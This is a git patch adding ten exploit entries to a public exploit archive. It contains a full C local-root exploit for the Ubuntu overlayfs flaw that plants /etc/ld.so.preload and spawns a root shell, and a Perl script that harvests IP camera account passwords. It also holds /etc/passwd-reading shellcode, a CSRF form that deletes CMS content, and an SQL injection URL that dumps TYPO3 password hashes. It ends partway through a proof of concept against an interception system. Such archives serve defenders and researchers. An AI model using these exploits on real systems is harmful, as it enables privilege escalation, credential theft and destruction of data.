From f6c02117f7fe749747e11110e372a1db83837cb5 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 17 Jun 2015 05:03:19 +0000
Subject: [PATCH] DB: 2015-06-17

10 new exploits
---
 files.csv                            |  11 +-
 platforms/hardware/webapps/37298.txt | 147 ++++++++++++++++
 platforms/linux/local/37292.c        | 153 +++++++++++++++++
 platforms/linux/local/37293.txt      |  97 +++++++++++
 platforms/linux/shellcode/37297.txt  |  51 ++++++
 platforms/php/webapps/37296.txt      |  36 ++++
 platforms/php/webapps/37301.txt      | 149 ++++++++++++++++
 platforms/php/webapps/37302.txt      | 107 ++++++++++++
 platforms/windows/dos/37287.html     | 244 +++++++++++++++++++++++++++
 platforms/windows/dos/37299.py       |  43 +++++
 platforms/windows/dos/37300.py       |  44 +++++
 11 files changed, 1081 insertions(+), 1 deletion(-)
 create mode 100755 platforms/hardware/webapps/37298.txt
 create mode 100755 platforms/linux/local/37292.c
 create mode 100755 platforms/linux/local/37293.txt
 create mode 100755 platforms/linux/shellcode/37297.txt
 create mode 100755 platforms/php/webapps/37296.txt
 create mode 100755 platforms/php/webapps/37301.txt
 create mode 100755 platforms/php/webapps/37302.txt
 create mode 100755 platforms/windows/dos/37287.html
 create mode 100755 platforms/windows/dos/37299.py
 create mode 100755 platforms/windows/dos/37300.py

diff --git a/files.csv b/files.csv
index 3dcdb5d51..7a8bbd3be 100755
--- a/files.csv
+++ b/files.csv
@@ -33625,7 +33625,11 @@ id,file,description,date,author,platform,type,port
 37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
 37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
-37256,platforms/multiple/webapps/37256.txt,"Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability",2015-06-10,Vulnerability-Lab,multiple,webapps,0
+37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80
+37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 (.wav) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
+37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 (.mp4) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
+37301,platforms/php/webapps/37301.txt,"TYPO3 Akronymmanager Extension 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",php,webapps,80
+37302,platforms/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",php,webapps,0
 37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
 37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
@@ -33637,6 +33641,7 @@ id,file,description,date,author,platform,type,port
 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
 37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
+37292,platforms/linux/local/37292.c,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell)",2015-06-16,%rebel%,linux,local,0
 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
 37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
 37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
@@ -33650,5 +33655,9 @@ id,file,description,date,author,platform,type,port
 37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0
 37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
+37287,platforms/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x_ 3.x_ 4.x - Client DoS PoC",2015-06-15,LiquidWorm,windows,dos,0
 37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
+37293,platforms/linux/local/37293.txt,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shadow File)",2015-06-16,%rebel%,linux,local,0
+37296,platforms/php/webapps/37296.txt,"Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - CSRF Vulnerability",2015-06-16,"Jerold Hoong",php,webapps,0
+37297,platforms/linux/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader (58 bytes)",2015-06-16,B3mB4m,linux,shellcode,0
diff --git a/platforms/hardware/webapps/37298.txt b/platforms/hardware/webapps/37298.txt
new file mode 100755
index 000000000..57b5f6154
--- /dev/null
+++ b/platforms/hardware/webapps/37298.txt
@@ -0,0 +1,147 @@
+*# Exploit Title: Apexis IP CAM - Full Info Disclosure **
+**# Google Dork: inurl:"get_status.cgi"cgi-bin/**
+**# Date: 01/06/2015**
+**# Exploit Author: Sunplace Solutions - Soluciones Informáticas - #RE 
+Remoteexecution.net**
+**# Vendor Homepage: http://www.apexis.com.cn/**
+**# Tested on: Linux**
+*
+*Models Afected :**
+**
+**APM-H602-MPC**
+**APM-H803-MPC**
+**APM-H901-MPC**
+**APM-H501-MPC**
+**APM-H403-MPC**
+**APM-H804*
+
+_*
+*__*Usage: please enter the url ipcam Example : *_
+
+http://server/cgi-bin/get_status.cgi o 
+http://server/cgi-bin/get_tutk_account.cgi
+
+_*You get something like this*__*:*_
+
+[Sunplace@solutions ]$ perl xploit.pl
+[ Apexis IP CAM - Full Info Disclosure ]
+[ Discovery by: Sunplace Solutions ]
+[ Exploit:  Sunplace Solutions - Daniel Godoy ]
+[ Greetz: www.remoteexecution.net - ]
+URL: http://server/cgi-bin/get_tutk_account.cgi
+
+[x]Trying to pwn =>/get_tutk_account.cgi
+Result:
+tutk_result=1;
+tutk_guid='FBX9937PJG273MPMMRZJ';
+tutk_user='admin';
+tutk_pwd='lolo2502';
+
+[x]Trying to pwn => /get_tutk_account
+Result:
+tutk_result=1;
+tutk_guid='FBX9937PJG273MPMMRZJ';
+tutk_user='admin';
+tutk_pwd='lolo2502';
+
+[x]Trying to pwn => /get_extra_server.cgi
+Result:
+extraserv_result=1;
+server_enable=0;
+server_ipaddr='192.168.1.220';
+server_port=6666;
+server_time=10;
+
+
+_*Index of /cgi-bin/ example:*_
+
+backup_params.cgi
+check_user.cgi
+clear_log.cgi
+control_cruise.cgi
+decoder_control.cgi
+delete_sdcard_file.cgi
+download_sdcard_file.cgi
+format_sdc.cgi
+get_alarm_schedule.cgi
+get_camera_vars.cgi
+get_cruise.cgi
+get_extra_server.cgi
+get_list_cruise.cgi
+get_log_info.cgi
+get_log_page.cgi
+get_maintain.cgi
+get_motion_schedule.cgi
+get_params.cgi
+get_preset_status.cgi
+get_real_status.cgi
+get_sdc_status.cgi
+get_status.cgi
+get_sycc_account.cgi
+get_tutk_account.cgi
+get_wifi_scan_result.cgi
+mobile_snapshot.cgi
+reboot.cgi
+
+And more......
+
+
+
+_*[Exploit Code]*__*
+*_
+#!/usr/bin/perl
+print "[ Apexis IP CAM - Full Info Disclosure ]\n";
+print "[ Discovery by: Sunplace Solutions ]\n";
+print "[ Exploit:  Sunplace Solutions ]\n";
+print "[ Greetz: www.remoteexecution.net - Daniel Godoy ]\n";
+print "URL: ";
+$url=<STDIN>;
+use LWP::UserAgent;
+my $ua = LWP::UserAgent->new;
+
+$ua->agent('Mozilla/35.0 (compatible; MSIE 5.0; Windows 7)');
+
+chop($url);
+if ($url eq "")
+   {
+     print 'URL dont empty!.'."\n";
+   }
+   else
+   {
+       $www = new LWP::UserAgent;
+       @path=split(/cgi-bin/,$url);
+       $content = $www->get($url) or error();
+     print "\n[x]Trying to pwn =>".$path[1]."\n";
+     print "Result: \n";
+
+       $pwn = $content->content;
+       $pwn=~ s/var//g;
+       $pwn=~ s/ //g;
+       $pwn=~ s/ret_//g;
+       print $pwn;
+
+     print "\n[x]Trying to pwn => /get_tutk_account\n";
+     print "Result: \n";
+       $content = $www->get($path[0]."cgi-bin/get_tutk_account.cgi") or 
+error();
+       $pwn = $content->content;
+       $pwn=~ s/var//g;
+       $pwn=~ s/ret_//g;
+       $pwn=~ s/ //g;
+
+       print $pwn;
+
+     print "\n[x]Trying to pwn => /get_extra_server.cgi\n";
+     print "Result: \n";
+       $content = $www->get($path[0]."cgi-bin/get_extra_server.cgi") or 
+error();
+       $pwn = $content->content;
+       $pwn=~ s/var//g;
+       $pwn=~ s/ret_//g;
+       $pwn=~ s/extra_//g;
+       $pwn=~ s/ //g;
+       print $pwn;
+   }
+
+
+
diff --git a/platforms/linux/local/37292.c b/platforms/linux/local/37292.c
new file mode 100755
index 000000000..3e92040cc
--- /dev/null
+++ b/platforms/linux/local/37292.c
@@ -0,0 +1,153 @@
+/*
+# Exploit Title: ofs.c - overlayfs local root in ubuntu
+# Date: 2015-06-15
+# Exploit Author: rebel
+# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
+# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
+# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
+
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
+CVE-2015-1328 / ofs.c
+overlayfs incorrect permission handling + FS_USERNS_MOUNT
+
+user@ubuntu-server-1504:~$ uname -a
+Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
+user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
+user@ubuntu-server-1504:~$ id
+uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
+user@ubuntu-server-1504:~$ ./ofs
+spawning threads
+mount #1
+mount #2
+child threads done
+/etc/ld.so.preload created
+creating shared library
+# id
+uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
+
+greets to beist & kaliman
+2015-05-24
+%rebel%
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sched.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/mount.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sched.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/mount.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <fcntl.h>
+#include <string.h>
+#include <linux/sched.h>
+
+#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
+
+static char child_stack[1024*1024];
+
+static int
+child_exec(void *stuff)
+{
+    char *file;
+    system("rm -rf /tmp/ns_sploit");
+    mkdir("/tmp/ns_sploit", 0777);
+    mkdir("/tmp/ns_sploit/work", 0777);
+    mkdir("/tmp/ns_sploit/upper",0777);
+    mkdir("/tmp/ns_sploit/o",0777);
+
+    fprintf(stderr,"mount #1\n");
+    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
+// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
+        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
+            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
+            exit(-1);
+        }
+        file = ".access";
+        chmod("/tmp/ns_sploit/work/work",0777);
+    } else file = "ns_last_pid";
+
+    chdir("/tmp/ns_sploit/o");
+    rename(file,"ld.so.preload");
+
+    chdir("/");
+    umount("/tmp/ns_sploit/o");
+    fprintf(stderr,"mount #2\n");
+    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
+        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
+            exit(-1);
+        }
+        chmod("/tmp/ns_sploit/work/work",0777);
+    }
+
+    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
+    umount("/tmp/ns_sploit/o");
+}
+
+int
+main(int argc, char **argv)
+{
+    int status, fd, lib;
+    pid_t wrapper, init;
+    int clone_flags = CLONE_NEWNS | SIGCHLD;
+
+    fprintf(stderr,"spawning threads\n");
+
+    if((wrapper = fork()) == 0) {
+        if(unshare(CLONE_NEWUSER) != 0)
+            fprintf(stderr, "failed to create new user namespace\n");
+
+        if((init = fork()) == 0) {
+            pid_t pid =
+                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
+            if(pid < 0) {
+                fprintf(stderr, "failed to create new mount namespace\n");
+                exit(-1);
+            }
+
+            waitpid(pid, &status, 0);
+
+        }
+
+        waitpid(init, &status, 0);
+        return 0;
+    }
+
+    usleep(300000);
+
+    wait(NULL);
+
+    fprintf(stderr,"child threads done\n");
+
+    fd = open("/etc/ld.so.preload",O_WRONLY);
+
+    if(fd == -1) {
+        fprintf(stderr,"exploit failed\n");
+        exit(-1);
+    }
+
+    fprintf(stderr,"/etc/ld.so.preload created\n");
+    fprintf(stderr,"creating shared library\n");
+    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
+    write(lib,LIB,strlen(LIB));
+    close(lib);
+    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
+    if(lib != 0) {
+        fprintf(stderr,"couldn't create dynamic library\n");
+        exit(-1);
+    }
+    write(fd,"/tmp/ofs-lib.so\n",16);
+    close(fd);
+    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
+    execl("/bin/su","su",NULL);
+}
+
diff --git a/platforms/linux/local/37293.txt b/platforms/linux/local/37293.txt
new file mode 100755
index 000000000..a354ef5c2
--- /dev/null
+++ b/platforms/linux/local/37293.txt
@@ -0,0 +1,97 @@
+The overlayfs filesystem does not correctly check file permissions when
+creating new files in the upper filesystem directory. This can be exploited
+by an unprivileged process in kernels with CONFIG_USER_NS=y and where
+overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs
+inside unprivileged mount namespaces. This is the default configuration of
+Ubuntu 12.04, 14.04, 14.10, and 15.04 [1].
+
+If you don't want to update your kernel and you don't use overlayfs, a viable
+workaround is to just remove or blacklist overlayfs.ko / overlay.ko.
+
+Details
+================================
+
+>From Documentation/filesystems/overlayfs.txt [2]:
+
+"Objects that are not directories (files, symlinks, device-special
+files etc.) are presented either from the upper or lower filesystem as
+appropriate.  When a file in the lower filesystem is accessed in a way
+the requires write-access, such as opening for write access, changing
+some metadata etc., the file is first copied from the lower filesystem
+to the upper filesystem (copy_up)."
+
+The ovl_copy_up_* functions do not correctly check that the user has
+permission to write files to the upperdir directory. The only permissions
+that are checked is if the owner of the file that is being modified has
+permission to write to the upperdir. Furthermore, when a file is copied from
+the lowerdir the file metadata is carbon copied, instead of attributes such as
+owner being changed to the user that triggered the copy_up_* procedures.
+
+Example of creating a 1:1 copy of a root-owned file:
+
+(Note that the workdir= option is not needed on older kernels)
+
+user@...ntu-server-1504:~$ ./create-namespace
+root@...ntu-server-1504:~# mount -t overlay -o
+lowerdir=/etc,upperdir=upper,workdir=work overlayfs o
+root@...ntu-server-1504:~# chmod 777 work/work/
+root@...ntu-server-1504:~# cd o
+root@...ntu-server-1504:~/o# mv shadow copy_of_shadow
+(exit the namespace)
+user@...ntu-server-1504:~$ ls -al upper/copy_of_shadow
+-rw-r----- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow
+user@...ntu-server-1504:~$ stat upper/copy_of_shadow /etc/shadow|grep Inode
+Device: 801h/2049d      Inode: 939791      Links: 1
+Device: 801h/2049d      Inode: 277668      Links: 1
+
+Now we can place this file in /etc by switching "upper" to be the lowerdir
+option, the permission checks pass since the file is owned by root and root
+can write to /etc.
+
+user@...ntu-server-1504:~$ ./create-namespace
+root@...ntu-server-1504:~# mount -t overlay -o
+lowerdir=upper,upperdir=/etc,workdir=work overlayfs o
+root@...ntu-server-1504:~# chmod 777 work/work/
+root@...ntu-server-1504:~# cd o
+root@...ntu-server-1504:~/o# chmod 777 copy_of_shadow
+root@...ntu-server-1504:~/o# exit
+user@...ntu-server-1504:~$ ls -al /etc/copy_of_shadow
+-rwxrwxrwx 1 root shadow 1236 May 24 15:51 /etc/copy_of_shadow
+
+The attached exploit gives a root shell by creating a world-writable
+/etc/ld.so.preload file. The exploit has been tested on the most recent
+kernels before 2015-06-15 on Ubuntu 12.04, 14.04, 14.10 and 15.04.
+
+It is also possible to list directory contents for any directory on the system
+regardless of permissions:
+
+nobody@...ntu-server-1504:~$ ls -al /root
+ls: cannot open directory /root: Permission denied
+nobody@...ntu-server-1504:~$ mkdir o upper work
+nobody@...ntu-server-1504:~$ mount -t overlayfs -o
+lowerdir=/root,upperdir=/home/user/upper,workdir=/home/user/work
+overlayfs /home/user/o
+nobody@...ntu-server-1504:~$ ls -al o 2>/dev/null
+total 8
+drwxrwxr-x 1 root nogroup 4096 May 24 16:33 .
+drwxr-xr-x 8 root nogroup 4096 May 24 16:33 ..
+-????????? ? ?    ?          ?            ? .bash_history
+-????????? ? ?    ?          ?            ? .bashrc
+d????????? ? ?    ?          ?            ? .cache
+-????????? ? ?    ?          ?            ? .lesshst
+d????????? ? ?    ?          ?            ? linux-3.19.0
+
+
+Credit
+================================
+Philip Pettersson, Samsung SDS Security Center
+
+References
+================================
+[1] https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/vivid/commit/?id=78ec4549
+[2] https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt
+[3] http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html
+
+
+
+## EDB Note: Exploit Mirror - https://www.exploit-db.com/exploits/37292/
\ No newline at end of file
diff --git a/platforms/linux/shellcode/37297.txt b/platforms/linux/shellcode/37297.txt
new file mode 100755
index 000000000..c8dd167e9
--- /dev/null
+++ b/platforms/linux/shellcode/37297.txt
@@ -0,0 +1,51 @@
+Linux/x86 - /etc/passwd Reader - 58 bytes
+
+#Greetz : Bomberman(Leader),wiremask.eu
+#Author : B3mB4m
+#Concat : Do not disturb - Bomberman
+#Bu adamı geçmeden konuşmaya iznim yok.Iki yıl sonra görüşmek üzre :)
+
+#Info
+#File descriptor on EBX
+#Buffer on ECX
+#Bytes to read on EDX
+
+
+Disassembly of section .text:
+
+08048060 <.text>:
+ 8048060:    31 c9                    xor    %ecx,%ecx
+ 8048062:    31 c0                    xor    %eax,%eax
+ 8048064:    31 d2                    xor    %edx,%edx
+ 8048066:    51                       push   %ecx
+ 8048067:    b0 05                    mov    $0x5,%al
+ 8048069:    68 73 73 77 64           push   $0x64777373
+ 804806e:    68 63 2f 70 61           push   $0x61702f63
+ 8048073:    68 2f 2f 65 74           push   $0x74652f2f
+ 8048078:    89 e3                    mov    %esp,%ebx
+ 804807a:    cd 80                    int    $0x80
+ 804807c:    89 d9                    mov    %ebx,%ecx
+ 804807e:    89 c3                    mov    %eax,%ebx
+ 8048080:    b0 03                    mov    $0x3,%al
+ 8048082:    66 ba ff 0f              mov    $0xfff,%dx
+ 8048086:    66 42                    inc    %dx
+ 8048088:    cd 80                    int    $0x80
+ 804808a:    31 c0                    xor    %eax,%eax
+ 804808c:    31 db                    xor    %ebx,%ebx
+ 804808e:    b3 01                    mov    $0x1,%bl
+ 8048090:    b0 04                    mov    $0x4,%al
+ 8048092:    cd 80                    int    $0x80
+ 8048094:    31 c0                    xor    %eax,%eax
+ 8048096:    b0 01                    mov    $0x1,%al
+ 8048098:    cd 80                    int    $0x80
+
+
+#include <stdio.h>
+#include <string.h>
+
+char *shellcode =
+"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
+
+int main(void){
+    fprintf(stdout,"Length: %d\n",strlen(shellcode));
+    (*(void(*)()) shellcode)();}
diff --git a/platforms/php/webapps/37296.txt b/platforms/php/webapps/37296.txt
new file mode 100755
index 000000000..fbc4d1548
--- /dev/null
+++ b/platforms/php/webapps/37296.txt
@@ -0,0 +1,36 @@
+﻿# Vulnerability type: Cross-site Request Forgery 
+# Vendor: http://www.ektron.com/
+# Product: Ektron Content Management System
+# Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.114)
+# Patched version: 9.10 SP1 (Build 9.1.0.184.1.120)
+# CVE ID: CVE-2015-3624
+# Credit: Jerold Hoong
+
+# PROOF OF CONCEPT (CSRF)
+
+Cross-site request forgery (CSRF) vulnerability in MenuActions.aspx in Ektron CMS 9.10
+SP1 before build 9.1.0.184.1.120 allows remote attackers to hijack the authentication
+of content administrators for requests that could lead to the deletion of content and
+assets.
+
+<html>
+  <body>
+    <form action="http://127.0.0.1/Test/WorkArea/DmsMenu/menuActions/MenuActions.aspx">
+      <input type="hidden" name="action" value="delete" />
+      <input type="hidden" name="contentId" value="4210" />
+      <input type="hidden" name="LangType" value="1033" />
+      <input type="hidden" name="folderId" value="561" />
+      <input type="hidden" name="redirectBack" value="true" />
+      <input type="hidden" name="menuType" value="Workarea" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+# TIMELINE
+– 07/04/2015: Vulnerability found
+– 07/04/2015: Vendor informed
+– 08/04/2015: Vendor responded and acknowledged
+- 01/05/2015: MITRE issued CVE number CVE-2015-3624
+– 28/05/2015: Vendor fixed the issue
+– 31/05/2015: Public disclosure
\ No newline at end of file
diff --git a/platforms/php/webapps/37301.txt b/platforms/php/webapps/37301.txt
new file mode 100755
index 000000000..69a228a28
--- /dev/null
+++ b/platforms/php/webapps/37301.txt
@@ -0,0 +1,149 @@
+Advisory: SQL Injection in TYPO3 Extension Akronymmanager
+
+An SQL injection vulnerability in the TYPO3 extension "Akronymmanager"
+allows authenticated attackers to inject SQL statements and thereby read
+data from the TYPO3 database.
+
+
+Details
+=======
+
+Product: sb_akronymmanager
+Affected Versions: <=0.5.0
+Fixed Versions: 7.0.0
+Vulnerability Type: SQL Injection
+Security Risk: medium
+Vendor URL: http://typo3.org/extensions/repository/view/sb_akronymmanager
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-002
+Advisory Status: published 
+CVE: CVE-2015-2803
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2803
+
+
+Introduction
+============
+
+"The Acronym Manager adds special explanatory markup to acronyms, abbreviations
+and foreign words on the whole site following the requirement to accessible web
+content.
+
+It provides a backend module to administer a list of words to generate new HTML
+elements for explanatory markup."
+
+(from the extension's documentation)
+
+
+More Details
+============
+
+Users with the respective privileges can maintain acronyms through the
+Akronymmanager extension pages in the TYPO3 backend web interface.
+
+In the extension's file mod1/index.php, an SQL query is generated like
+follows (line 357 and following):
+
+[...]
+$pageID = t3lib_div::_GET("id");
+if ($pageID) $where = "uid='$pageID' AND ";
+$result = $GLOBALS['TYPO3_DB']->exec_SELECTquery('title,uid', 'pages',
+    $where.'hidden="0" AND deleted="0"','sorting');
+[...]
+
+The value of the user-supplied HTTP GET parametre 'id' is used without
+sanitizing it before its use in the subsequent SQL statement. Therefore,
+attackers are able to manipulate the resulting SQL statement and inject
+their own queries into the statement.
+
+
+Proof of Concept
+================
+
+When requesting the following URL, the vulnerability is exploited to yield all
+usernames and hashes from the TYPO3 be_users database:
+
+------------------------------------------------------------------------
+http://server/typo3conf/ext/sb_akronymmanager/mod1/index.php?
+id=379%27%20UNION%20SELECT%20(SELECT%20group_concat(username,%27:%27,password)
+%20FROM%20be_users),2%20--%20
+------------------------------------------------------------------------
+
+The login credentials are then embedded in the HTML page that is
+returned: 
+
+[...]
+  <!-- Section header -->
+  <h2>user1:$hash,user2:$hash[...]</h2>
+[...]
+
+
+Workaround
+==========
+
+Only give trusted users access to the Akronymmanager extension in the
+TYPO3 backend.
+
+
+Fix
+===
+
+Upgrade the extension to version 7.0.0.
+
+
+Security Risk
+=============
+
+An attacker who has access to the backend part of the Akronymmanager
+extension may send SQL queries to the database. This can be used to read
+arbitrary tables of the TYPO3 database and may ultimately result in a
+privilege escalation if the TYPO3 users' password hashes can be cracked
+efficiently. Depending on the database configuration, it might also be
+possible to execute arbitrary commands on the database host.  As the
+attack requires an attacker who already has backend access, the
+vulnerability is estimated to pose only a medium risk.
+
+
+Timeline
+========
+
+2015-02-25 Vulnerability identified
+2015-03-04 Customer approved disclosure to vendor
+2015-03-10 CVE number requested
+2015-03-10 Vendor notified
+2015-03-26 CVE number requested again
+2015-03-31 CVE number assigned (request #2)
+2015-03-31 Vendor notified again
+2015-03-31 Vendor responded
+2015-04-08 Vendor announced fixed version available at the end of April
+2015-05-13 Requested update from vendor
+2015-05-15 Vendor requests more time
+2015-05-21 Requested update from vendor
+2015-05-22 Vendor states that upload to extension registry doesn't work
+2015-06-03 Requested update from vendor
+2015-06-10 Vendor uploads new version to extension registry
+2015-06-15 Advisory published
+
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at
+https://www.redteam-pentesting.de.
+
+
+-- 
+RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
+Dennewartstr. 25-27                       Fax : +49 241 510081-99
+52068 Aachen                    https://www.redteam-pentesting.de
+Germany                         Registergericht: Aachen HRB 14004
+Geschäftsführer:                       Patrick Hof, Jens Liebchen
\ No newline at end of file
diff --git a/platforms/php/webapps/37302.txt b/platforms/php/webapps/37302.txt
new file mode 100755
index 000000000..5429e4d3f
--- /dev/null
+++ b/platforms/php/webapps/37302.txt
@@ -0,0 +1,107 @@
+Advisory:  E-Detective Lawful Interception System
+    multiple security vulnerabilities
+Date:    14/06/2015
+CVE:    unassigned
+Authors:  Mustafa Al-Bassam (https://musalbas.com)
+    slipstream/RoL (https://twitter.com/TheWack0lian)
+Software:  Decision Group E-Detective Lawful Interception System
+Vendor URL:  http://www.edecision4u.com/
+
+Software description:
+
+"E-Detective is a real-time Internet interception, monitoring and
+forensics system that captures, decodes, and reconstructs various types
+of Internet traffic. It is commonly used for organization Internet
+behavioural monitoring, auditing, record keeping, forensics analysis, and
+investigation, as well as, legal and lawful interception for lawful
+enforcement agencies such as Police Intelligence, Military Intelligence,
+Cyber Security Departments, National Security Agencies, Criminal
+Investigation Agencies, Counter Terrorism Agencies etc."
+
+Vulnerabilities:
+
+1) Unauthenticated Local File Disclosure
+
+-----
+Proof-of-concept:
+https://github.com/musalbas/edetective-poc/blob/master/pwned-detective.py
+
+# Proof-of-concept for unauthenticated LFD in E-Detective.
+# Authors: Mustafa Al-Bassam (https://musalbas.com)
+#          slipstream/RoL (https://twitter.com/TheWack0lian)
+
+import argparse
+import base64
+import urllib2
+
+
+def display_banner():
+    print """
+                              _        
+                             | |       
+ _ ____      ___ __   ___  __| |______ 
+| '_ \ \ /\ / / '_ \ / _ \/ _` |______|
+| |_) \ V  V /| | | |  __/ (_| |       
